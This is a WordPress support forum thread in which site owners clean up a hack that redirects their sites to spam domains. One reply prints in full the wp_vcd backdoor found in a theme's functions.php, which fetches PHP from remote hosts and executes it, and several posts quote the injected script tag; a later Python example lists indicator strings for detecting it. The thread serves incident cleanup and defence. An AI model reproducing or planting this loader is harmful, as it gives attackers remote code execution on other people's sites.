• Resolved lfbender

    (@lfbender)


    My site is being redirected to:
    https://1.tellmebluehistory.icu/?p=gqydoobwg45gi3bpgqytk&sub1=Xil&sub2=refers.v1

    This code can be found in the header of literally all posts and pages of the site:
    <script src='https://js.wiilberedmodels.com/pistats.js?l=p&' type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pistats.js?l=p&' type=text/javascript language=javascript></script><script src='https://js.wiilberedmodels.com/pistats.js?l=p&' type=text/javascript language=javascript></script>

    This is an old site that we keep around because it has more traffic than the new one that we are working on, and we want to keep it around until the new site is more visible. We don’t update its plugins anymore except with the same posts we make on our new site. Some premium plugins are very outdated and I know this is a security issue, but we don’t want to spend the money on them.

    The main problem is that the wp-admin page is also redirected and I have no idea where to look for malicious code to get this fixed, as if I could log in, I could install some security plugins.

    What I did so far is follow various tutorials on site hacks, trying to clean the files.
    I removed malicious code from functions.php and malicious php files like wp-tmp.php etc.

    I searched file contents for base?64_de?code

    I checked the .htaccess file and it seems clean (no contents at all).

    I ended up putting completely fresh WordPress files with the old database, and the redirect still remained.

    Then I saw that the script above was in all post content basically, so I deleted the script from the database after doing a backup. The redirect still remains. I also checked if any new users have registered recently, but that is not the case.

    UPDATE: I have also cloned the empty site with the old database to a new domain and it is not redirecting there.

    So I am out of ideas on this right now.

    Any ideas/help with this issue would be greatly appreciated.

    • This topic was modified 5 years, 2 months ago by lfbender.


Viewing 7 replies - 1 through 7 (of 7 total)
  • Back up your DB before you do this.

    Update queries we used:

    UPDATE wp_posts SET post_content = REPLACE(post_content,"PUT_THE_SCRIPT_HERE","");
    UPDATE wp_posts SET guid = REPLACE(guid,"PUT_THE_SCRIPT_HERE","");
    UPDATE wp_postmeta SET meta_value = REPLACE(meta_value,"PUT_THE_SCRIPT_HERE","");

    UPDATE wp_options SET option_value = REPLACE(option_value,"PUT_THE_LINK_HERE","PUT_HOMEPAGE_LINK_HERE") WHERE option_name = "siteurl";
    UPDATE wp_options SET option_value = REPLACE(option_value,"PUT_THE_LINK_HERE","PUT_HOMEPAGE_LINK_HERE") WHERE option_name = "home";

    Did you update the wp_options as well? They change the home/WordPress URL with the hack.

    Then, after that, renew your DB password and update plugins.

    • This reply was modified 5 years, 2 months ago by simplix.
    Thread Starter lfbender

    (@lfbender)

    Thank you @simplix for this.

    I tried to follow your instructions as closely as possible and I found additional things in the database to correct. I didn’t, however, find anything for the guid and the postmeta.
    Which wouldn’t bother me, except the site’s behavior didn’t change, so there has to be other things. I now saw that I probably have other things in the files too, I just have no idea what to look for anymore.
    I cannot unfortunately update the plugins as wp-admin is still not accessible.

    Hey @lfbender

    Maybe there’s a second script injected. You should check if there’s a different script from the first one in wp_posts or wp_options.

    Also check if the wp_options table -> siteurl and home are set correctly. If that’s fixed, try to go to /wp-admin.

    If that still doesn’t work, clear your cache or try an incognito tab / different browser.

    Tristan

    (@tristanpopegmailcom)

    I have been fighting this for a week now. I thought I got it all and the injector but it just keeps coming back and harder than before. I did what you said @simplix and got back into my site with the latest attack. But I just can’t seem to find the damn injector that keeps doing it. I even have 3 malware programs running on the site and it isn’t helping.

    Wish I knew what to look for.

    In our case it was the outdated AAM plugin we run on a lot of sites. Updating those fixed the problem.

    If you have any outdated plugins, update those right after you get back into wp-admin.

    Then change your database password and update wp-config. After that, change the admin password in WordPress.

    Thread Starter lfbender

    (@lfbender)

    So I managed to clean all my sites (7), so thank you @simplix.

    These are the steps I have taken (using also what @simplix wrote).

    At the very beginning of the functions.php in the affected theme, before anything else, was a whole block of code that looked like this:

    <?php
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '****random looking numbers****'))
    {
    $div_code_name="wp_vcd";
    switch ($_REQUEST['action'])
    {
    
    case 'change_domain';
    if (isset($_REQUEST['newdomain']))
    {
    
    if (!empty($_REQUEST['newdomain']))
    {
    if ($file = @file_get_contents(__FILE__))
    {
    if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
    {
    
    $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
    @file_put_contents(__FILE__, $file);
    print "true";
    }
    
    }
    }
    }
    break;
    
    case 'change_code';
    if (isset($_REQUEST['newcode']))
    {
    
    if (!empty($_REQUEST['newcode']))
    {
    if ($file = @file_get_contents(__FILE__))
    {
    if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
    {
    
    $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
    @file_put_contents(__FILE__, $file);
    print "true";
    }
    
    }
    }
    }
    break;
    
    default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }
    
    die("");
    }
    
    $div_code_name = "wp_vcd";
    $funcfile      = __FILE__;
    if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
    
    function file_get_contents_tcurl($url)
    {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
    }
    
    function theme_temp_setup($phpCode)
    {
    $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
    $handle   = fopen($tmpfname, "w+");
    if( fwrite($handle, "<?php\n" . $phpCode))
    {
    }
    else
    {
    $tmpfname = tempnam('./', "theme_temp_setup");
    $handle   = fopen($tmpfname, "w+");
    fwrite($handle, "<?php\n" . $phpCode);
    }
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
    }
    
    $wp_auth_key='12335f8c45ff73be536601a7562a3220';
    if (($tmpcontent = @file_get_contents("https://www.parors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("https://www.parors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
    
    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    
    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
    @file_put_contents('wp-tmp.php', $tmpcontent);
    }
    }
    
    }
    }
    
    elseif ($tmpcontent = @file_get_contents("https://www.parors.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
    
    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    
    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
    @file_put_contents('wp-tmp.php', $tmpcontent);
    }
    }
    
    }
    } 
    
    elseif ($tmpcontent = @file_get_contents("https://www.parors.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {
    
    if (stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
    
    if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
    @file_put_contents('wp-tmp.php', $tmpcontent);
    }
    }
    
    }
    }
    elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent));
    
    } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent)); 
    
    } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
    extract(theme_temp_setup($tmpcontent)); 
    
    } 
    
    }
    }
    
    //$start_wp_theme_tmp
    //wp_tmp
    //$end_wp_theme_tmp
    ?>

    I deleted this.

    Then I went into the wp-includes folder and deleted:
    wp-vcd.php
    wp-tmp.php
    wp-feed.php

    Then I went into phpMyAdmin for the database cleaning:

    I did a full database search for %bullgoesdown% and %wiilberedmodels% (these were the pages that the user was sent to, even though it is not the page you see when you see the redirect in action, because these sites are also only redirecting), which gave me probably every single post and page content. From this I saw the exact scripts and where the malware had made changes.

    I used the exact script to do what @simplix suggested for the post_content column of the wp_posts table. Then I found and changed the malware site addresses in wp_options.

    If you have a hard time finding initial data on what to look for, I used https://aw-snap.info which has a tool for printing out the page’s code for analysis. There you should be able to find the scripts that are used and keywords for the spammy domains.

    As a last step I deleted the wp-rocket cache, changed passwords, deleted unused themes and updated all plugins that were free.

    Hope this helps someone else too.

    • This reply was modified 5 years, 2 months ago by lfbender.
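    As an added example (not code from this thread or from WordPress), the checks lfbender's cleanup steps above boil down to, in Python: scan an install for the wp_vcd indicators quoted from functions.php and the dropped wp-includes files, and strip the injected script tag from post content the way the REPLACE queries do. The indicator list and the regex are assumptions built only from the strings shown in this thread.

```python
"""Added example, not code from the thread: flag the wp_vcd indicators that
lfbender's posts describe, and strip the injected <script> tag from post
content the way the REPLACE queries above do."""
import os
import re

# Strings present in the dropper quoted from functions.php above (a constructed
# list taken from that code, not an exhaustive wp_vcd signature set).
FILE_INDICATORS = ("wp_vcd", "theme_temp_setup", "file_get_contents_tcurl",
                   "$start_wp_theme_tmp", "$end_wp_theme_tmp", "wp-tmp.php")
# File names the thread reports being dropped into wp-includes.
DROPPED_FILES = {"wp-vcd.php", "wp-tmp.php", "wp-feed.php"}
# The injected tag from the first post; the host is the one named in the
# thread, while the path and query vary (pistats.js/pystats.js, l=p/l=l).
INJECTED_SCRIPT = re.compile(
    r"<script\s+src=['\"]?https?://js\.wiilberedmodels\.com/[^'\" >]*['\"]?"
    r"[^>]*>\s*</script>", re.IGNORECASE)


def scan_source(text):
    """Return the indicator strings found in one PHP file's contents."""
    return [s for s in FILE_INDICATORS if s in text]


def scan_tree(root):
    """Walk a WordPress install and map each suspicious file (relative path)
    to the reasons it was flagged: a dropped file name or indicator strings."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if name in DROPPED_FILES:
                hits[rel] = ["dropped file name"]
            elif name.endswith(".php"):
                with open(full, encoding="utf-8", errors="replace") as fh:
                    found = scan_source(fh.read())
                if found:
                    hits[rel] = found
    return hits


def strip_injected_script(html):
    """Remove every copy of the injected tag (the first post shows three in a
    row) and return the cleaned content with the number of copies removed."""
    return INJECTED_SCRIPT.subn("", html)
```

    Run scan_tree() against the site's document root and review every hit by hand before deleting; strip_injected_script() is the equivalent of the post_content REPLACE query for content exported from the database.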

    Hello guys… Thanks for helping.

    I still need some help with @simplix’s tips. I’m not an expert in phpMyAdmin and so I can’t use these scripts to change the post_content:

    UPDATE wp_posts SET post_content = REPLACE(post_content,"PUT_THE_SCRIPT_HERE","");
    UPDATE wp_posts SET guid = REPLACE(guid,"PUT_THE_SCRIPT_HERE","");
    UPDATE wp_postmeta SET meta_value = REPLACE(meta_value,"PUT_THE_SCRIPT_HERE","");

    Every time I have a syntax issue. So, how can I insert the malware script ( <script src=\’https://js.wiilberedmodels.com/pystats.js?l=l&amp;\’ type=text/javascript language=javascript></script> ) there?

    Is it like this?

    UPDATE wp_posts SET post_content = REPLACE(post_content,"<script src=\'https://js.wiilberedmodels.com/pystats.js?l=l&amp;\' type=text/javascript language=javascript></script>","");

    ???

  • The topic ‘Spammy site redirect’ is closed to new replies.